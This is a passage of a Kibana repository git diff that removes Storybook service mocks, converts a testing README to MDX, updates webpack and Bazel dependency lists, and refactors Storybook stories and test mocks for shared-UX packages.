docLinksServiceFactory, - editorsServiceFactory, - httpServiceFactory, - platformServiceFactory, - servicesFactory, - userPermissionsServiceFactory, - dataServiceFactory, -} from './services'; - -export type { DataServiceFactoryConfig } from './services'; diff --git a/packages/kbn-shared-ux-storybook/src/services/application.ts b/packages/kbn-shared-ux-storybook/src/services/application.ts deleted file mode 100644 index 1b16526bc8be8..0000000000000 --- a/packages/kbn-shared-ux-storybook/src/services/application.ts +++ /dev/null @@ -1,24 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { BehaviorSubject } from 'rxjs'; -import { action } from '@storybook/addon-actions'; -import { ServiceFactory, SharedUxApplicationService } from '@kbn/shared-ux-services'; - -export type ApplicationServiceFactory = ServiceFactory; - -/** - * A factory function for creating for creating a storybook implementation of `SharedUXApplicationService`. - */ -export const applicationServiceFactory: ApplicationServiceFactory = () => ({ - navigateToUrl: (url) => { - action('navigateToUrl')(url); - return Promise.resolve(); - }, - currentAppId$: new BehaviorSubject('123'), -}); diff --git a/packages/kbn-shared-ux-storybook/src/services/data.ts b/packages/kbn-shared-ux-storybook/src/services/data.ts deleted file mode 100644 index dbfd2fceb4210..0000000000000 --- a/packages/kbn-shared-ux-storybook/src/services/data.ts +++ /dev/null @@ -1,34 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { ServiceFactory, SharedUxDataService } from '@kbn/shared-ux-services'; - -export interface DataServiceFactoryConfig { - hasESData: boolean; - hasDataView: boolean; - hasUserDataView: boolean; -} - -/** - * A factory function for creating a Storybook implementation of `SharedUxDataService`. - */ -export type SharedUxDataServiceFactory = ServiceFactory< - SharedUxDataService, - DataServiceFactoryConfig ->; - -/** - * A factory function for creating a Storybook implementation of `SharedUxDataService`. - */ -export const dataServiceFactory: SharedUxDataServiceFactory = (params) => { - return { - hasESData: () => Promise.resolve(params.hasESData || false), - hasDataView: () => Promise.resolve(params.hasDataView || false), - hasUserDataView: () => Promise.resolve(params.hasUserDataView || false), - }; -}; diff --git a/packages/kbn-shared-ux-storybook/src/services/doc_links.ts b/packages/kbn-shared-ux-storybook/src/services/doc_links.ts deleted file mode 100644 index eff942989956f..0000000000000 --- a/packages/kbn-shared-ux-storybook/src/services/doc_links.ts +++ /dev/null @@ -1,22 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { ServiceFactory, SharedUxDocLinksService } from '@kbn/shared-ux-services'; - -/** - * A factory function for creating a Storybook implementation of `SharedUxDocLinksService`. - */ -export type SharedUxDocLinksServiceFactory = ServiceFactory; - -/** - * A factory function for creating a Storybook implementation of `SharedUxDocLinksService`. - */ -export const docLinksServiceFactory: SharedUxDocLinksServiceFactory = () => ({ - dataViewsDocLink: 'https://www.elastic.co/guide/en/kibana/master/data-views.html', - kibanaGuideDocLink: 'https://www.elastic.co/guide/en/kibana/master/index.html', -}); diff --git a/packages/kbn-shared-ux-storybook/src/services/editors.ts b/packages/kbn-shared-ux-storybook/src/services/editors.ts deleted file mode 100644 index 69b9d7062da94..0000000000000 --- a/packages/kbn-shared-ux-storybook/src/services/editors.ts +++ /dev/null @@ -1,22 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { action } from '@storybook/addon-actions'; -import { ServiceFactory, SharedUxEditorsService } from '@kbn/shared-ux-services'; - -/** - * A factory function for creating a Storybook implementation of `SharedUxEditorsService`. - */ -export type SharedUxEditorsServiceFactory = ServiceFactory; - -/** - * A factory function for creating a Storybook implementation of `SharedUxEditorsService`. - */ -export const editorsServiceFactory: SharedUxEditorsServiceFactory = () => ({ - openDataViewEditor: action('openEditor') as SharedUxEditorsService['openDataViewEditor'], -}); diff --git a/packages/kbn-shared-ux-storybook/src/services/http.ts b/packages/kbn-shared-ux-storybook/src/services/http.ts deleted file mode 100644 index f44fb10566dc3..0000000000000 --- a/packages/kbn-shared-ux-storybook/src/services/http.ts +++ /dev/null @@ -1,23 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { action } from '@storybook/addon-actions'; - -import { ServiceFactory, SharedUxHttpService } from '@kbn/shared-ux-services'; - -/** - * A factory function for creating a Storybook-based implementation of `SharedUXHttpService`. - */ -export type HttpServiceFactory = ServiceFactory; - -/** - * A factory function for creating a Storybook-based implementation of `SharedUXHttpService`. - */ -export const httpServiceFactory: HttpServiceFactory = () => ({ - addBasePath: action('addBasePath') as SharedUxHttpService['addBasePath'], -}); diff --git a/packages/kbn-shared-ux-storybook/src/services/index.ts b/packages/kbn-shared-ux-storybook/src/services/index.ts deleted file mode 100644 index ff6ad1f1f2913..0000000000000 --- a/packages/kbn-shared-ux-storybook/src/services/index.ts +++ /dev/null @@ -1,40 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import type { ServiceFactory, SharedUxServices } from '@kbn/shared-ux-services'; - -import { applicationServiceFactory } from './application'; -import { docLinksServiceFactory } from './doc_links'; -import { editorsServiceFactory } from './editors'; -import { httpServiceFactory } from './http'; -import { platformServiceFactory } from './platform'; -import { userPermissionsServiceFactory } from './permissions'; -import { dataServiceFactory, DataServiceFactoryConfig } from './data'; - -export { applicationServiceFactory } from './application'; -export { docLinksServiceFactory } from './doc_links'; -export { editorsServiceFactory } from './editors'; -export { httpServiceFactory } from './http'; -export { platformServiceFactory } from './platform'; -export { userPermissionsServiceFactory } from './permissions'; -export { dataServiceFactory } from './data'; - -/** - * A factory function for creating a Storybook implementation of `SharedUxServices`. - */ -export const servicesFactory: ServiceFactory = (params) => ({ - application: applicationServiceFactory(), - docLinks: docLinksServiceFactory(), - editors: editorsServiceFactory(), - http: httpServiceFactory(params), - permissions: userPermissionsServiceFactory(), - platform: platformServiceFactory(params), - data: dataServiceFactory(params as DataServiceFactoryConfig), -}); - -export type { DataServiceFactoryConfig } from './data'; diff --git a/packages/kbn-shared-ux-storybook/src/services/permissions.ts b/packages/kbn-shared-ux-storybook/src/services/permissions.ts deleted file mode 100644 index 5d00ac3ee1cb2..0000000000000 --- a/packages/kbn-shared-ux-storybook/src/services/permissions.ts +++ /dev/null @@ -1,22 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { ServiceFactory, SharedUxUserPermissionsService } from '@kbn/shared-ux-services'; - -/** - * A factory function for creating a Storybook implementation of `SharedUxUserPermissionsService`. - */ -export type SharedUxUserPermissionsServiceFactory = ServiceFactory; - -/** - * A factory function for creating a Storybook implementation of `SharedUxUserPermissionsService`. - */ -export const userPermissionsServiceFactory: SharedUxUserPermissionsServiceFactory = () => ({ - canCreateNewDataView: true, - canAccessFleet: true, -}); diff --git a/packages/kbn-shared-ux-storybook/src/services/platform.ts b/packages/kbn-shared-ux-storybook/src/services/platform.ts deleted file mode 100644 index 2a1cb6c3ff42b..0000000000000 --- a/packages/kbn-shared-ux-storybook/src/services/platform.ts +++ /dev/null @@ -1,22 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0 and the Server Side Public License, v 1; you may not use this file except - * in compliance with, at your election, the Elastic License 2.0 or the Server - * Side Public License, v 1. - */ - -import { action } from '@storybook/addon-actions'; -import { ServiceFactory, SharedUxPlatformService } from '@kbn/shared-ux-services'; - -/** - * A factory function for creating a Storybook implementation of `SharedUxPlatformService`. - */ -export type PlatformServiceFactory = ServiceFactory; - -/** - * A factory function for creating a Storybook implementation of `SharedUxPlatformService`. - */ -export const platformServiceFactory: PlatformServiceFactory = () => ({ - setIsFullscreen: action('setIsChromeVisible'), -}); diff --git a/packages/kbn-test/BUILD.bazel b/packages/kbn-test/BUILD.bazel index 700467a46db84..7094425f81f9f 100644 --- a/packages/kbn-test/BUILD.bazel +++ b/packages/kbn-test/BUILD.bazel @@ -32,7 +32,6 @@ NPM_MODULE_EXTRA_FILES = [ "jest_integration_node/jest-preset.js", "jest_node/jest-preset.js", "jest.config.js", - "README.md", "package.json", ] diff --git a/packages/kbn-test/README.md b/packages/kbn-test/README.mdx similarity index 90% rename from packages/kbn-test/README.md rename to packages/kbn-test/README.mdx index 72fb5c3358ce7..5e52b68b7a0cb 100644 --- a/packages/kbn-test/README.md +++ b/packages/kbn-test/README.mdx @@ -1,10 +1,17 @@ -Kibana Testing Library -====================== +--- +id: kibDevDocsOpsTest +slug: /kibana-dev-docs/ops/test +title: '@kbn/test' +description: A package provide ways to run tests +date: 2022-08-15 +tags: ['kibana', 'dev', 'contributor', 'operations', 'cli', 'dev', 'mode', 'test'] +--- + +# Kibana Testing Library The @kbn/test package provides ways to run tests. Currently only functional testing is provided by this library, with unit and other testing possibly added here. -Functional Testing -------------------- +## Functional Testing ### Dependencies @@ -12,14 +19,16 @@ Functional testing methods exist in the `src/functional_tests` directory. They d ### Exposed methods -#### runTests(configPaths: Array) +#### `runTests(configPaths: Array)` + For each config file specified in configPaths, starts Elasticsearch and Kibana once, runs tests specified in that config file, and shuts down Elasticsearch and Kibana once completed. (Repeats for every config file.) `configPaths`: array of strings, each an absolute path to a config file that looks like [this](../../test/functional/config.base.js), following the config schema specified [here](../../src/functional_test_runner/lib/config/schema.js). Internally the method that starts Elasticsearch comes from [kbn-es](../../packages/kbn-es). -#### startServers(configPath: string) +#### `startServers(configPath: string)` + Starts Elasticsearch and Kibana servers given a specified config. `configPath`: absolute path to a config file that looks like [this](../../test/functional/config.base.js), following the config schema specified [here](../../src/functional_test_runner/lib/config/schema.js). diff --git a/packages/kbn-ui-shared-deps-npm/BUILD.bazel b/packages/kbn-ui-shared-deps-npm/BUILD.bazel index 8f3823a56b2d9..94ea101c61003 100644 --- a/packages/kbn-ui-shared-deps-npm/BUILD.bazel +++ b/packages/kbn-ui-shared-deps-npm/BUILD.bazel @@ -50,7 +50,6 @@ RUNTIME_DEPS = [ "@npm//react-router-dom", "@npm//react-router", "@npm//react", - "@npm//regenerator-runtime", "@npm//rison-node", "@npm//rxjs", "@npm//styled-components", @@ -87,7 +86,6 @@ TYPES_DEPS = [ "@npm//react-is", "@npm//react-router", "@npm//react-router-dom", - "@npm//regenerator-runtime", "@npm//rison-node", "@npm//rxjs", "@npm//styled-components", diff --git a/packages/kbn-ui-shared-deps-npm/webpack.config.js b/packages/kbn-ui-shared-deps-npm/webpack.config.js index ddcb71fdb2c86..8096e9ea6e429 100644 --- a/packages/kbn-ui-shared-deps-npm/webpack.config.js +++ b/packages/kbn-ui-shared-deps-npm/webpack.config.js @@ -34,7 +34,6 @@ module.exports = (_, argv) => { 'kbn-ui-shared-deps-npm': [ // polyfill code 'core-js/stable', - 'regenerator-runtime/runtime', 'whatwg-fetch', 'symbol-observable', // Parts of node-libs-browser that are used in many places across Kibana @@ -50,30 +49,35 @@ module.exports = (_, argv) => { * node scripts/find_babel_runtime_helpers_in_use.js */ '@babel/runtime/helpers/assertThisInitialized', + '@babel/runtime/helpers/asyncToGenerator', '@babel/runtime/helpers/classCallCheck', '@babel/runtime/helpers/classPrivateFieldGet', '@babel/runtime/helpers/classPrivateFieldSet', + '@babel/runtime/helpers/createClass', + '@babel/runtime/helpers/createForOfIteratorHelper', '@babel/runtime/helpers/createSuper', '@babel/runtime/helpers/defineProperty', '@babel/runtime/helpers/extends', '@babel/runtime/helpers/inherits', + '@babel/runtime/helpers/inheritsLoose', '@babel/runtime/helpers/interopRequireDefault', '@babel/runtime/helpers/interopRequireWildcard', '@babel/runtime/helpers/objectSpread2', '@babel/runtime/helpers/objectWithoutProperties', '@babel/runtime/helpers/objectWithoutPropertiesLoose', '@babel/runtime/helpers/slicedToArray', - '@babel/runtime/helpers/toArray', + '@babel/runtime/helpers/taggedTemplateLiteralLoose', '@babel/runtime/helpers/toConsumableArray', '@babel/runtime/helpers/typeof', '@babel/runtime/helpers/wrapNativeSuper', + '@babel/runtime/regenerator', // modules from npm '@elastic/charts', '@elastic/eui', + '@elastic/eui/optimize/es/services', + '@elastic/eui/optimize/es/services/format', '@elastic/eui/dist/eui_charts_theme', - '@elastic/eui/lib/services', - '@elastic/eui/lib/services/format', '@elastic/eui/dist/eui_theme_light.json', '@elastic/eui/dist/eui_theme_dark.json', '@elastic/numeral', diff --git a/packages/kbn-ui-shared-deps-src/BUILD.bazel b/packages/kbn-ui-shared-deps-src/BUILD.bazel index 18d50fdc05e63..db8d6c64fb6db 100644 --- a/packages/kbn-ui-shared-deps-src/BUILD.bazel +++ b/packages/kbn-ui-shared-deps-src/BUILD.bazel @@ -27,7 +27,7 @@ NPM_MODULE_EXTRA_FILES = [ ] RUNTIME_DEPS = [ - "//packages/elastic-safer-lodash-set", + "//packages/kbn-safer-lodash-set", "//packages/kbn-analytics", "//packages/kbn-babel-preset", "//packages/kbn-datemath", @@ -41,7 +41,7 @@ RUNTIME_DEPS = [ ] TYPES_DEPS = [ - "//packages/elastic-safer-lodash-set:npm_module_types", + "//packages/kbn-safer-lodash-set:npm_module_types", "//packages/kbn-analytics:npm_module_types", "//packages/kbn-datemath:npm_module_types", "//packages/kbn-i18n:npm_module_types", diff --git a/packages/kbn-ui-shared-deps-src/src/definitions.js b/packages/kbn-ui-shared-deps-src/src/definitions.js index 3e783d99b62cf..759b1bee856d2 100644 --- a/packages/kbn-ui-shared-deps-src/src/definitions.js +++ b/packages/kbn-ui-shared-deps-src/src/definitions.js @@ -75,7 +75,7 @@ const externals = { tslib: '__kbnSharedDeps__.TsLib', '@kbn/analytics': '__kbnSharedDeps__.KbnAnalytics', '@kbn/std': '__kbnSharedDeps__.KbnStd', - '@elastic/safer-lodash-set': '__kbnSharedDeps__.SaferLodashSet', + '@kbn/safer-lodash-set': '__kbnSharedDeps__.SaferLodashSet', 'rison-node': '__kbnSharedDeps__.RisonNode', history: '__kbnSharedDeps__.History', classnames: '__kbnSharedDeps__.Classnames', diff --git a/packages/kbn-ui-shared-deps-src/src/entry.js b/packages/kbn-ui-shared-deps-src/src/entry.js index bc521a2d72ecc..233872bacff58 100644 --- a/packages/kbn-ui-shared-deps-src/src/entry.js +++ b/packages/kbn-ui-shared-deps-src/src/entry.js @@ -39,8 +39,8 @@ export const RxjsOperators = require('rxjs/operators'); export const ElasticNumeral = require('@elastic/numeral'); export const ElasticCharts = require('@elastic/charts'); export const ElasticEui = require('@elastic/eui'); -export const ElasticEuiLibServices = require('@elastic/eui/lib/services'); -export const ElasticEuiLibServicesFormat = require('@elastic/eui/lib/services/format'); +export const ElasticEuiLibServices = require('@elastic/eui/optimize/es/services'); +export const ElasticEuiLibServicesFormat = require('@elastic/eui/optimize/es/services/format'); export const ElasticEuiChartsTheme = require('@elastic/eui/dist/eui_charts_theme'); export const KbnDatemath = require('@kbn/datemath'); export const ReactBeautifulDnD = require('react-beautiful-dnd'); @@ -55,7 +55,7 @@ export const Fflate = { unzlibSync, strFromU8 }; export const TsLib = require('tslib'); export const KbnAnalytics = require('@kbn/analytics'); export const KbnStd = require('@kbn/std'); -export const SaferLodashSet = require('@elastic/safer-lodash-set'); +export const SaferLodashSet = require('@kbn/safer-lodash-set'); export const RisonNode = require('rison-node'); export const History = require('history'); export const Classnames = require('classnames'); diff --git a/packages/kbn-ui-shared-deps-src/src/polyfills.js b/packages/kbn-ui-shared-deps-src/src/polyfills.js index a9ec32023f2bf..cc8e1f9b75d5c 100644 --- a/packages/kbn-ui-shared-deps-src/src/polyfills.js +++ b/packages/kbn-ui-shared-deps-src/src/polyfills.js @@ -7,7 +7,7 @@ */ require('core-js/stable'); -require('regenerator-runtime/runtime'); +require('@babel/runtime/regenerator'); if (typeof window.Event === 'object') { // IE11 doesn't support unknown event types, required by react-use diff --git a/packages/shared-ux/avatar/solution/src/solution_avatar.stories.tsx b/packages/shared-ux/avatar/solution/src/solution_avatar.stories.tsx index b47ff7c837f24..f7dca09fc8b1f 100644 --- a/packages/shared-ux/avatar/solution/src/solution_avatar.stories.tsx +++ b/packages/shared-ux/avatar/solution/src/solution_avatar.stories.tsx @@ -10,7 +10,7 @@ import React from 'react'; import { KibanaSolutionAvatar, IconTypeProps, KnownSolutionProps } from './solution_avatar'; export default { - title: 'Solution Avatar', + title: 'Avatar/Solution', description: 'A wrapper around EuiAvatar, specifically to stylize Elastic Solutions', }; @@ -24,11 +24,11 @@ const argTypes = { type KnownSolutionParams = Pick; -export const SolutionAvatar = (params: KnownSolutionParams) => { +export const SolutionType = (params: KnownSolutionParams) => { return ; }; -SolutionAvatar.argTypes = { +SolutionType.argTypes = { name: { control: 'select', options: ['Cloud', 'Elastic', 'Kibana', 'Observability', 'Security', 'Enterprise Search'], @@ -39,11 +39,11 @@ SolutionAvatar.argTypes = { type IconTypeParams = Pick; -export const IconTypeAvatar = (params: IconTypeParams) => { +export const IconType = (params: IconTypeParams) => { return ; }; -IconTypeAvatar.argTypes = { +IconType.argTypes = { iconType: { control: 'select', options: [ diff --git a/packages/shared-ux/button/exit_full_screen/mocks/BUILD.bazel b/packages/shared-ux/button/exit_full_screen/mocks/BUILD.bazel index cd88ae0f1fe27..50a3e109546cd 100644 --- a/packages/shared-ux/button/exit_full_screen/mocks/BUILD.bazel +++ b/packages/shared-ux/button/exit_full_screen/mocks/BUILD.bazel @@ -10,8 +10,17 @@ SOURCE_FILES = glob( "src/**/*.ts", ], exclude = [ + "**/*.config.js", + "**/*.mock.*", "**/*.test.*", "**/*.stories.*", + "**/__snapshots__", + "**/integration_tests", + "**/mocks", + "**/scripts", + "**/storybook", + "**/test_fixtures", + "**/test_helpers", ], ) @@ -38,6 +47,7 @@ NPM_MODULE_EXTRA_FILES = [ # eg. "@npm//lodash" RUNTIME_DEPS = [ "@npm//@storybook/addon-actions", + "@npm//react", "//packages/shared-ux/storybook/mock", ] @@ -53,6 +63,7 @@ RUNTIME_DEPS = [ TYPES_DEPS = [ "@npm//@types/node", "@npm//@types/jest", + "@npm//@types/react", "@npm//@storybook/addon-actions", "//packages/shared-ux/button/exit_full_screen/types:npm_module_types", "//packages/shared-ux/storybook/mock:npm_module_types", @@ -65,6 +76,14 @@ jsts_transpiler( root_input_dir = "src", ) +jsts_transpiler( + name = "target_web", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", + web = True, +) + ts_config( name = "tsconfig", src = "tsconfig.json", @@ -90,7 +109,7 @@ ts_project( js_library( name = PKG_DIRNAME, srcs = NPM_MODULE_EXTRA_FILES, - deps = RUNTIME_DEPS + [":target_node"], + deps = RUNTIME_DEPS + [":target_node", ":target_web"], package_name = PKG_REQUIRE_NAME, visibility = ["//visibility:public"], ) diff --git a/packages/shared-ux/button/exit_full_screen/mocks/package.json b/packages/shared-ux/button/exit_full_screen/mocks/package.json index 490d136049e1a..1ce5731e7bee3 100644 --- a/packages/shared-ux/button/exit_full_screen/mocks/package.json +++ b/packages/shared-ux/button/exit_full_screen/mocks/package.json @@ -3,5 +3,6 @@ "private": true, "version": "1.0.0", "main": "./target_node/index.js", + "browser": "./target_web/index.js", "license": "SSPL-1.0 OR Elastic License 2.0" } \ No newline at end of file diff --git a/packages/shared-ux/button/exit_full_screen/mocks/tsconfig.json b/packages/shared-ux/button/exit_full_screen/mocks/tsconfig.json index 894f01d3220e9..dc96ec41f9035 100644 --- a/packages/shared-ux/button/exit_full_screen/mocks/tsconfig.json +++ b/packages/shared-ux/button/exit_full_screen/mocks/tsconfig.json @@ -9,10 +9,12 @@ "stripInternal": false, "types": [ "jest", - "node" + "node", + "react" ] }, "include": [ - "src/**/*" + "**/*.ts", + "**/*.tsx", ] } diff --git a/packages/shared-ux/card/no_data/impl/src/no_data_card.stories.tsx b/packages/shared-ux/card/no_data/impl/src/no_data_card.stories.tsx index 5c7b1a57c11f2..8574b31da792a 100644 --- a/packages/shared-ux/card/no_data/impl/src/no_data_card.stories.tsx +++ b/packages/shared-ux/card/no_data/impl/src/no_data_card.stories.tsx @@ -11,8 +11,7 @@ import React from 'react'; import { NoDataCardStorybookMock } from '@kbn/shared-ux-card-no-data-mocks'; import type { NoDataCardStorybookParams } from '@kbn/shared-ux-card-no-data-mocks'; -import { NoDataCard as Component } from './no_data_card.component'; -import { NoDataCard as ConnectedComponent } from './no_data_card'; +import { NoDataCard } from './no_data_card'; import { NoDataCardProvider } from './services'; import mdx from '../README.mdx'; @@ -28,21 +27,14 @@ export default { }; const mock = new NoDataCardStorybookMock(); - const argTypes = mock.getArgumentTypes(); -export const NoDataCard = (params: NoDataCardStorybookParams) => { +export const Card = (params: NoDataCardStorybookParams) => { return ( - + ); }; -NoDataCard.argTypes = argTypes; - -export const NoDataCardComponent = (params: NoDataCardStorybookParams) => { - return ; -}; - -NoDataCardComponent.argTypes = argTypes; +Card.argTypes = argTypes; diff --git a/packages/shared-ux/card/no_data/mocks/BUILD.bazel b/packages/shared-ux/card/no_data/mocks/BUILD.bazel index dbfc44a31b864..3aec9c86207c9 100644 --- a/packages/shared-ux/card/no_data/mocks/BUILD.bazel +++ b/packages/shared-ux/card/no_data/mocks/BUILD.bazel @@ -10,8 +10,17 @@ SOURCE_FILES = glob( "src/**/*.ts", ], exclude = [ + "**/*.config.js", + "**/*.mock.*", "**/*.test.*", "**/*.stories.*", + "**/__snapshots__", + "**/integration_tests", + "**/mocks", + "**/scripts", + "**/storybook", + "**/test_fixtures", + "**/test_helpers", ], ) @@ -39,6 +48,8 @@ NPM_MODULE_EXTRA_FILES = [ RUNTIME_DEPS = [ "@npm//@storybook/addon-actions", "@npm//deepmerge", + "@npm//lodash", + "@npm//react", "//packages/shared-ux/link/redirect_app/mocks", "//packages/shared-ux/storybook/mock", ] @@ -53,13 +64,15 @@ RUNTIME_DEPS = [ # # References to NPM packages work the same as RUNTIME_DEPS TYPES_DEPS = [ - "@npm//@types/node", - "@npm//@types/jest", "@npm//@storybook/addon-actions", + "@npm//@types/jest", + "@npm//@types/lodash", + "@npm//@types/node", + "@npm//@types/react", "@npm//deepmerge", - "//packages/shared-ux/storybook/mock:npm_module_types", - "//packages/shared-ux/link/redirect_app/mocks:npm_module_types", "//packages/shared-ux/card/no_data/types:npm_module_types", + "//packages/shared-ux/link/redirect_app/mocks:npm_module_types", + "//packages/shared-ux/storybook/mock:npm_module_types", ] jsts_transpiler( @@ -69,6 +82,14 @@ jsts_transpiler( root_input_dir = "src", ) +jsts_transpiler( + name = "target_web", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", + web = True, +) + ts_config( name = "tsconfig", src = "tsconfig.json", @@ -94,7 +115,7 @@ ts_project( js_library( name = PKG_DIRNAME, srcs = NPM_MODULE_EXTRA_FILES, - deps = RUNTIME_DEPS + [":target_node"], + deps = RUNTIME_DEPS + [":target_node", ":target_web"], package_name = PKG_REQUIRE_NAME, visibility = ["//visibility:public"], ) diff --git a/packages/shared-ux/card/no_data/mocks/package.json b/packages/shared-ux/card/no_data/mocks/package.json index d9f12c7e81fcd..10380b879954c 100644 --- a/packages/shared-ux/card/no_data/mocks/package.json +++ b/packages/shared-ux/card/no_data/mocks/package.json @@ -3,5 +3,6 @@ "private": true, "version": "1.0.0", "main": "./target_node/index.js", + "browser": "./target_web/index.js", "license": "SSPL-1.0 OR Elastic License 2.0" } \ No newline at end of file diff --git a/packages/shared-ux/card/no_data/mocks/src/jest.ts b/packages/shared-ux/card/no_data/mocks/src/jest.ts index bf8ac47239bcf..9a89d0cd3b747 100644 --- a/packages/shared-ux/card/no_data/mocks/src/jest.ts +++ b/packages/shared-ux/card/no_data/mocks/src/jest.ts @@ -5,7 +5,10 @@ * in compliance with, at your election, the Elastic License 2.0 or the Server * Side Public License, v 1. */ + import deepmerge from 'deepmerge'; +import { isPlainObject } from 'lodash'; + import type { NoDataCardServices, NoDataCardKibanaDependencies, @@ -43,7 +46,7 @@ export const getKibanaDependenciesMock = ( const integrations = params.canAccessFleet !== undefined ? params.canAccessFleet : defaultParams.canAccessFleet; - return deepmerge( + const result = deepmerge( { coreStart: { http: { @@ -60,6 +63,11 @@ export const getKibanaDependenciesMock = ( }, }, }, - getRedirectAppLinksKibanaDependenciesMock() + getRedirectAppLinksKibanaDependenciesMock(), + { + isMergeableObject: isPlainObject, + } ); + + return result; }; diff --git a/packages/shared-ux/card/no_data/mocks/tsconfig.json b/packages/shared-ux/card/no_data/mocks/tsconfig.json index 894f01d3220e9..dc96ec41f9035 100644 --- a/packages/shared-ux/card/no_data/mocks/tsconfig.json +++ b/packages/shared-ux/card/no_data/mocks/tsconfig.json @@ -9,10 +9,12 @@ "stripInternal": false, "types": [ "jest", - "node" + "node", + "react" ] }, "include": [ - "src/**/*" + "**/*.ts", + "**/*.tsx", ] } diff --git a/packages/shared-ux/link/redirect_app/impl/src/redirect_app_links.test.tsx b/packages/shared-ux/link/redirect_app/impl/src/redirect_app_links.test.tsx index 6342f9f6e1f6a..56a6e1b4f7494 100644 --- a/packages/shared-ux/link/redirect_app/impl/src/redirect_app_links.test.tsx +++ b/packages/shared-ux/link/redirect_app/impl/src/redirect_app_links.test.tsx @@ -10,10 +10,14 @@ import React, { MouseEvent } from 'react'; import { mount as enzymeMount, ReactWrapper } from 'enzyme'; +import { + getRedirectAppLinksKibanaDependenciesMock, + getRedirectAppLinksServicesMock, +} from '@kbn/shared-ux-link-redirect-app-mocks'; + import { RedirectAppLinksKibanaProvider, RedirectAppLinksProvider } from './services'; import { RedirectAppLinks } from './redirect_app_links.container'; import { RedirectAppLinks as ComposedWrapper } from './redirect_app_links'; -import { Observable } from 'rxjs'; export type UnmountCallback = () => void; export type MountPoint = (element: T) => UnmountCallback; @@ -251,21 +255,8 @@ describe('RedirectAppLinks', () => { navigateToUrl.mockReset(); }); - const kibana = { - coreStart: { - application: { - currentAppId$: new Observable((subscriber) => { - subscriber.next('123'); - }), - navigateToUrl, - }, - }, - }; - - const services = { - currentAppId: 'abc123', - navigateToUrl, - }; + const kibana = getRedirectAppLinksKibanaDependenciesMock({ navigateToUrl }); + const services = getRedirectAppLinksServicesMock({ navigateToUrl }); const provider = (node: React.ReactElement) => enzymeMount({node}); diff --git a/packages/shared-ux/link/redirect_app/mocks/BUILD.bazel b/packages/shared-ux/link/redirect_app/mocks/BUILD.bazel index f0607a798c833..2b28f97f2f639 100644 --- a/packages/shared-ux/link/redirect_app/mocks/BUILD.bazel +++ b/packages/shared-ux/link/redirect_app/mocks/BUILD.bazel @@ -8,10 +8,20 @@ PKG_REQUIRE_NAME = "@kbn/shared-ux-link-redirect-app-mocks" SOURCE_FILES = glob( [ "src/**/*.ts", + "src/**/*.tsx", ], exclude = [ + "**/*.config.js", + "**/*.mock.*", "**/*.test.*", "**/*.stories.*", + "**/__snapshots__", + "**/integration_tests", + "**/mocks", + "**/scripts", + "**/storybook", + "**/test_fixtures", + "**/test_helpers", ], ) @@ -37,6 +47,7 @@ NPM_MODULE_EXTRA_FILES = [ # "@npm//name-of-package" # eg. "@npm//lodash" RUNTIME_DEPS = [ + "@npm//react", "@npm//@storybook/addon-actions", "@npm//rxjs", "//packages/shared-ux/storybook/mock", @@ -52,6 +63,9 @@ RUNTIME_DEPS = [ # # References to NPM packages work the same as RUNTIME_DEPS TYPES_DEPS = [ + "@npm//@types/node", + "@npm//@types/jest", + "@npm//@types/react", "@npm//@storybook/addon-actions", "@npm//rxjs", "//packages/shared-ux/link/redirect_app/types", @@ -65,6 +79,14 @@ jsts_transpiler( root_input_dir = "src", ) +jsts_transpiler( + name = "target_web", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", + web = True, +) + ts_config( name = "tsconfig", src = "tsconfig.json", @@ -90,7 +112,7 @@ ts_project( js_library( name = PKG_DIRNAME, srcs = NPM_MODULE_EXTRA_FILES, - deps = RUNTIME_DEPS + [":target_node"], + deps = RUNTIME_DEPS + [":target_node", ":target_web"], package_name = PKG_REQUIRE_NAME, visibility = ["//visibility:public"], ) diff --git a/packages/shared-ux/link/redirect_app/mocks/jest.config.js b/packages/shared-ux/link/redirect_app/mocks/jest.config.js index 6f1b6fd89f35e..ac5f8e5dcf92f 100644 --- a/packages/shared-ux/link/redirect_app/mocks/jest.config.js +++ b/packages/shared-ux/link/redirect_app/mocks/jest.config.js @@ -7,7 +7,7 @@ */ module.exports = { - preset: '@kbn/test/jest_node', + preset: '@kbn/test', rootDir: '../../../../..', roots: ['/packages/shared-ux/link/redirect_app/mocks'], }; diff --git a/packages/shared-ux/link/redirect_app/mocks/package.json 